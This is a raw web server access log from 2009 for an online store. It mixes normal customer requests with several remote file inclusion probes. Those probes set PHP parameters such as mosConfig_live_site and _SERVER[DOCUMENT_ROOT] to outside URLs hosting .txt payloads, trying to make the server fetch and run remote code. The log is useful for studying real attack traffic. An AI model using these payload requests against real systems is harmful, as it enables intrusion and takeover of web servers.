121.125.74.87 - - [23/Sep/2009:00:00:27 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.125.74.87 - - [23/Sep/2009:00:00:27 -0400] "GET /logs/access_log.Q109082000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.125.74.87 - - [23/Sep/2009:00:00:27 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:00:29 -0400] "GET /images/bt_cal-b.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113214600E8B000ECF7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
121.125.74.87 - - [23/Sep/2009:00:00:32 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:01:43 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:43 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:43 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:43 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:44 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:44 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:44 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:44 -0400] "GET /images/AMEX.GIF HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:45 -0400] "GET /images/DISCOVER.GIF HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:45 -0400] "GET /images/MCARD.GIF HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:45 -0400] "GET /images/VISA.GIF HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:45 -0400] "GET /images/space.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:46 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:46 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:46 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:46 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:46 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:52 -0400] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113214600E8B000ECF7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG HTTP/1.1" 200 60452 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113214600E8B000ECF7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:01:57 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01D810000477019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
189.55.128.16 - - [23/Sep/2009:00:02:19 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:00:02:19 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
189.55.128.16 - - [23/Sep/2009:00:02:19 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:00:03:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.47.71.89 - - [23/Sep/2009:00:03:51 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
211.47.71.89 - - [23/Sep/2009:00:03:51 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.47.71.89 - - [23/Sep/2009:00:03:51 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 200 18979 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:03:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG HTTP/1.1" 200 45227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:53 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:03:54 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:04:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113234106C8C0008F27019+M37+ENG HTTP/1.1" 200 59852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113224E01B820000377019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
189.55.128.16 - - [23/Sep/2009:00:04:34 -0400] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
119.63.193.55 - - [23/Sep/2009:00:04:51 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
211.47.71.89 - - [23/Sep/2009:00:04:56 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:05:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211323460E58D0009667019+M37+ENG HTTP/1.1" 200 45227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.47.71.89 - - [23/Sep/2009:00:05:23 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.47.71.89 - - [23/Sep/2009:00:05:23 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
211.47.71.89 - - [23/Sep/2009:00:05:23 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 200 18979 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:05:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113234C00C87000C407019+M37+ENG HTTP/1.1" 200 59852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211323460E58D0009667019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.225.196.53 - - [23/Sep/2009:00:06:10 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hachon.co.kr/bbs/icon/member_image_box/1/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:00:06:17 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hachon.co.kr/bbs/icon/member_image_box/1/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:06:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113234B05B87000D667019+M37+ENG HTTP/1.1" 200 45227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.47.71.89 - - [23/Sep/2009:00:06:32 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
